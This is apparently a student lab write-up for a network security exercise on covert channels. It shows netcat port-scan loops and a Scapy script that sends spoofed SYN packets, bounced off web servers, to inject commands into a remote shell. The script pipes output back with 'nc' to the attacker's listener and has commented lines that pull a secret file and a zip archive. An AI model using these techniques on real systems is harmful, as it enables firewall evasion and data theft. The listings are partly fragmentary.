4 First thing we did was just scanning the host.
6 We did not get very far, as the remote host is not directly accessible.
7 (At least it looked like that at first, as we did not read the exercise sheet properly.)
9 The commands we used for bruteforcing were as follows:
12 $ ping -c1 192.168.67.15
13 $ for i in `seq 1 1000`; do echo "test" | nc -w1 192.168.67.115 $i & ; done
14 $ for i in `seq 1 1000`; do echo "test" | nc -u -w1 192.168.67.115 $i & ; done
17 We did not see any output on the remote machine, as we somehow managed to break the remote screen functionality, so we were mostly working into the dark.
19 As we did not see any results of our tests we continued to read the exercise sheet.
20 This did reveal that there is a firewall in place.
22 As we did not see any output on the remote machine it is quite possible that the firewall is a network level firewall - after all we did not see any packets, neither ICMP traffic nor TCP or UDP traffic.
23 Therefore the firewall could be located on the remote machine as well as on an intermediate bridging firewall. (For our definition it could not be on an intermediate router, as the machine was located in the same network as we were.)
25 When trying to send the first spoofed packet we did immediately succeed, as we saw some output on the remote screen.
26 (We did see the console, only the wireshark-window was buggy for us.)
27 Finding the rest of the covert channel was quite easy, as the exercise sheet revealed to us that we had to bounce our connection over the remote webservers.
28 When trying to send a SYN packet we found an example, which also defined the sequence number so we did try that as first attempt and succeeded.
29 (We quickly saw that the resulting character was similar to the sequence number we sent - we just had to subtract one, as the webservers incremented the sequence number)
31 Once we were able to send characters to the remote shell we quickly saw, that we got autoblocked by some script.
32 The easiest method was to just to continue sending characters to the remote machine by using the next server.
34 As we were told that alternating between the hosts was the idea of the exercise we did optimize our method a little bit by splitting our command in 4 byte blocks and rotate automatically over the HTTP servers.
37 IP source was always our target, {\tt 192.168.67.115}, source port was {\tt 1337}.
38 (As the SYN-ACK would bounce to the target host on the same port.)
39 IP destination was one of the HTTP servers, {\tt 192.168.67.200}, {\tt 192.168.67.210} and {\tt 192.168.67.220}, destination port was {\tt 80}.
40 We did not modify the TTL or the IP ID, so those should be the default values.
41 The sequence value was the character we were trying to send minus one.
42 We never saw the acknowledged sequence value, as this was directed towards the target host.
44 The code responsible for sending a character was as follows:
46 \begin{redframe}\begin{scriptsize}\begin{verbatim}
47 ip=IP(src=src,dst=dst)
48 SYN=TCP(sport=sport,dport=dport,flags='S',seq=ord(char)-1)
50 \end{verbatim}\end{scriptsize}\end{redframe}
54 We created a connect-back socket by opening a local port via netcat:
60 Using this socket we did extract all of the information we found on the remote system.
62 \begin{redframe}\begin{scriptsize}\begin{verbatim}
65 # disable IPv6 error message
67 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
68 from scapy.all import *
69 logging.getLogger("scapy.runtime").setLevel(logging.WARN)
71 #send(IP(dst='127.0.0.1')/TCP(sport=1337))
74 src = '192.168.67.115'
75 # our intermediate syn-servers
76 dst = ['192.168.67.200', '192.168.67.210', '192.168.67.220']
80 self = '192.168.67.26'
81 # our local connectback port
84 def sendchar(dst, char):
86 ip=IP(src=src,dst=dst)
87 SYN=TCP(sport=sport,dport=dport,flags='S',seq=ord(char)-1)
91 cmd += "|nc "+self+" "+port+"\r"
93 chunklist = [ cmd[i:i+chunksize] for i in range(0, len(cmd), chunksize) ]
94 for chunkid, chunk in enumerate(chunklist):
95 curdst = chunkid % len(dst)
97 sendchar(dst[curdst], char)
101 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
102 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
103 inet 127.0.0.1/8 scope host lo
104 valid_lft forever preferred_lft forever
105 inet6 ::1/128 scope host
106 valid_lft forever preferred_lft forever
107 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
108 link/ether 08:00:27:27:2b:f0 brd ff:ff:ff:ff:ff:ff
109 inet 192.168.67.115/24 brd 192.168.67.255 scope global eth0
110 valid_lft forever preferred_lft forever
111 inet6 fe80::a00:27ff:fe27:2bf0/64 scope link
112 valid_lft forever preferred_lft forever
122 New Text Documnet.txt.zip
126 #run("cat secret") # copy file with 'nc -l 26555 > secret'
127 #run("cat *.zip") # copy file with 'nc -l 26555 > New\ Text\ Documnet.txt.zip'
128 \end{verbatim}\end{scriptsize}\end{redframe}